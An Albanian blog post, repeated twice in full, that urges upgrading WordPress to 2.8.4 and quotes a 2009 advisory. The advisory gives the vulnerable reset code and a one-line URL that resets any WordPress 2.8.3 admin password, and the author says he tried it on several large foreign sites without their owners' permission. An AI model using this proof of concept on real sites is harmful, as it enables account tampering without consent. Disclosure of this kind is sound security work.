Upgrade WordPress në versionin 2.8.4
</p><p style="text-align: center;">
</p>
<p style="text-align: left;">Isha duke hulumtuar në internet përkatesisht në forumin e webmasterave shqiptarë (webmaster.al) dhe pashë një njoftim nga Olgi ku tregonte për një lëshim në versionin 2.8.3 dhe se në një kohë faqja juaj mund të bëhej cak i hakerave dhe mund të të shkaktonin ndonjë dëm.</p>
<p style="text-align: left;">Ky lëshim nuk ka zgjatur shumë përshkak se stafii i wordpress ka bërë mënjëherë arnimin e këtij lëshimit dhe ka nxjerrë versionin 2.8.4 në rregull dhe pa ndonjë lëshim (tani për tani). Andaj ajo cka do të ju preferoja unë juve është që ti bëni update të gjitha blogjet tuaja të ndërtuara me wordpress nga versioni 2.8.4.</p>
</p>
Pershendetje</p>
Sot kur u zgjova ne mengjes pashe ne emailin tim qe kishte ardhur nje email per te bere reset fjalkalimin tim por faktikisht nuk kisha kerkuar nje fjalkalim te ri. Mendova se do ishte ndonje qe donte te talleshe por kur kerkova pak me teper pashe qe dikush (ndonje mendjendritur) kishte arritur te gjente nje problem ne cdo version te Wordpress 2.8.3 e poshte dhe me URL-ne e meposhtme (duke ditur emailin e administratorit) bente reset fjalkalimin.</p>
http://www.domainname.com/wp-login.php?action=rp&key[]=</p>
Nuk eshte ndonje problem i madh sepse seshte se merrte akses ne blogun tuaj por menjeher doli update 2.8.4 nga Wordpress keshtu qe ju sygjeroj te beni update ne versionin e fundit.</p>
E provova personalisht kte gje ne disa faqe vertet te medhaja te huaja dhe funksionovi, e theksoj, nuk ka ndonje rrezik vetem se ju ndryshon passwordin dhe duhet ta ri-ndryshoni.</p>
Hulumtova pakz në internet më gjere rreth këtij problemi dhe hasa në këtë exploit të postuar në milw0rm</p>
=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================</p>
I. VULNERABILITY
————————-
WordPress <= 2.8.3 Remote admin reset password II. BACKGROUND ————————- WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it. III. DESCRIPTION ————————- The way Wordpress handle a password reset looks like this: You submit your email adress or username via this form /wp-login.php?action=lostpassword ; Wordpress send you a reset confirmation like that via email: ” Someone has asked to reset the password for the following site and username. http://DOMAIN_NAME.TLD/wordpress Username: admin To reset your password visit the following address, otherwise just ignore this email and nothing will happen http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag ” You click on the link, and then Wordpress reset your admin password, and sends you over another email with your new credentials. Let’s see how it works: wp-login.php: …[snip]…. line 186: function reset_password($key) { global $wpdb; $key = preg_replace(’/[^a-z0-9]/i’, ”, $key); if ( empty( $key ) ) return new WP_Error(’invalid_key’, __(’Invalid key’)); $user = $wpdb->get_row($wpdb->prepare(”SELECT * FROM $wpdb->users WHERE user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(’invalid_key’, __(’Invalid key’));
…[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ‘login’;
$errors = new WP_Error();</p>
if ( isset($_GET['key']) )
$action = ‘resetpass’;</p>
// validate action so as to default to the login screen
if ( !in_array($action, array(’logout’, ‘lostpassword’, ‘retrievepassword’, ‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false === has_filter(’login_form_’ . $action) )
$action = ‘login’;
…[snip]….</p>
line 370:</p>
break;</p>
case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET['key']);</p>
if ( ! is_wp_error($errors) ) {
wp_redirect(’wp-login.php?checkemail=newpass’);
exit();
}</p>
wp_redirect(’wp-login.php?action=lostpassword&error=invalidkey’);
exit();</p>
break;
…[snip ]…</p>
You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key
variable.</p>
IV. PROOF OF CONCEPT
————————-
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.</p>
V. BUSINESS IMPACT
————————-
An attacker could exploit this vulnerability to compromise the admin
account of any wordpress/wordpress-mu <= 2.8.3</p>
VI. SYSTEMS AFFECTED
————————-
All</p>
VII. SOLUTION
————————-
No patch aviable for the moment.</p>
VIII. REFERENCES
————————-
http://www.wordpress.org</p>
IX. CREDITS
————————-
This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com
I’d like to shoot some greetz to securityreason.com for them great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38</p>
X. REVISION HISTORY
————————-
August 10th, 2009: Initial release</p>
XI. LEGAL NOTICES
————————-
The information contained within this advisory is supplied “as-is”
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.</p>
# milw0rm.com [2009-08-11]</p>
Ky artikull eshte marre nga: http://granit.blog.al/?p=288. Per me shume artikuj te ngjashem vizitoni: http://granit.blog.al/?p=288
</p><p style="text-align: center;">
<p style="text-align: left;">Isha duke hulumtuar në internet përkatesisht në forumin e webmasterave shqiptarë (webmaster.al) dhe pashë një njoftim nga Olgi ku tregonte për një lëshim në versionin 2.8.3 dhe se në një kohë faqja juaj mund të bëhej cak i hakerave dhe mund të të shkaktonin ndonjë dëm.</p>
<p style="text-align: left;">Ky lëshim nuk ka zgjatur shumë përshkak se stafii i wordpress ka bërë mënjëherë arnimin e këtij lëshimit dhe ka nxjerrë versionin 2.8.4 në rregull dhe pa ndonjë lëshim (tani për tani). Andaj ajo cka do të ju preferoja unë juve është që ti bëni update të gjitha blogjet tuaja të ndërtuara me wordpress nga versioni 2.8.4.</p>
</p>
Pershendetje</p>
Sot kur u zgjova ne mengjes pashe ne emailin tim qe kishte ardhur nje email per te bere reset fjalkalimin tim por faktikisht nuk kisha kerkuar nje fjalkalim te ri. Mendova se do ishte ndonje qe donte te talleshe por kur kerkova pak me teper pashe qe dikush (ndonje mendjendritur) kishte arritur te gjente nje problem ne cdo version te Wordpress 2.8.3 e poshte dhe me URL-ne e meposhtme (duke ditur emailin e administratorit) bente reset fjalkalimin.</p>
http://www.domainname.com/wp-login.php?action=rp&key[]=</p>
Nuk eshte ndonje problem i madh sepse seshte se merrte akses ne blogun tuaj por menjeher doli update 2.8.4 nga Wordpress keshtu qe ju sygjeroj te beni update ne versionin e fundit.</p>
E provova personalisht kte gje ne disa faqe vertet te medhaja te huaja dhe funksionovi, e theksoj, nuk ka ndonje rrezik vetem se ju ndryshon passwordin dhe duhet ta ri-ndryshoni.</p>
Hulumtova pakz në internet më gjere rreth këtij problemi dhe hasa në këtë exploit të postuar në milw0rm</p>
=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================</p>
I. VULNERABILITY
————————-
WordPress <= 2.8.3 Remote admin reset password II. BACKGROUND ————————- WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it. III. DESCRIPTION ————————- The way Wordpress handle a password reset looks like this: You submit your email adress or username via this form /wp-login.php?action=lostpassword ; Wordpress send you a reset confirmation like that via email: ” Someone has asked to reset the password for the following site and username. http://DOMAIN_NAME.TLD/wordpress Username: admin To reset your password visit the following address, otherwise just ignore this email and nothing will happen http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag ” You click on the link, and then Wordpress reset your admin password, and sends you over another email with your new credentials. Let’s see how it works: wp-login.php: …[snip]…. line 186: function reset_password($key) { global $wpdb; $key = preg_replace(’/[^a-z0-9]/i’, ”, $key); if ( empty( $key ) ) return new WP_Error(’invalid_key’, __(’Invalid key’)); $user = $wpdb->get_row($wpdb->prepare(”SELECT * FROM $wpdb->users WHERE user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(’invalid_key’, __(’Invalid key’));
…[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ‘login’;
$errors = new WP_Error();</p>
if ( isset($_GET['key']) )
$action = ‘resetpass’;</p>
// validate action so as to default to the login screen
if ( !in_array($action, array(’logout’, ‘lostpassword’, ‘retrievepassword’, ‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false === has_filter(’login_form_’ . $action) )
$action = ‘login’;
…[snip]….</p>
line 370:</p>
break;</p>
case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET['key']);</p>
if ( ! is_wp_error($errors) ) {
wp_redirect(’wp-login.php?checkemail=newpass’);
exit();
}</p>
wp_redirect(’wp-login.php?action=lostpassword&error=invalidkey’);
exit();</p>
break;
…[snip ]…</p>
You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key
variable.</p>
IV. PROOF OF CONCEPT
————————-
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.</p>
V. BUSINESS IMPACT
————————-
An attacker could exploit this vulnerability to compromise the admin
account of any wordpress/wordpress-mu <= 2.8.3</p>
VI. SYSTEMS AFFECTED
————————-
All</p>
VII. SOLUTION
————————-
No patch aviable for the moment.</p>
VIII. REFERENCES
————————-
http://www.wordpress.org</p>
IX. CREDITS
————————-
This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com
I’d like to shoot some greetz to securityreason.com for them great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38</p>
X. REVISION HISTORY
————————-
August 10th, 2009: Initial release</p>
XI. LEGAL NOTICES
————————-
The information contained within this advisory is supplied “as-is”
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.</p>
# milw0rm.com [2009-08-11]</p>
Ky artikull eshte marre nga: http://granit.blog.al/?p=288. Per me shume artikuj te ngjashem vizitoni: http://granit.blog.al/?p=288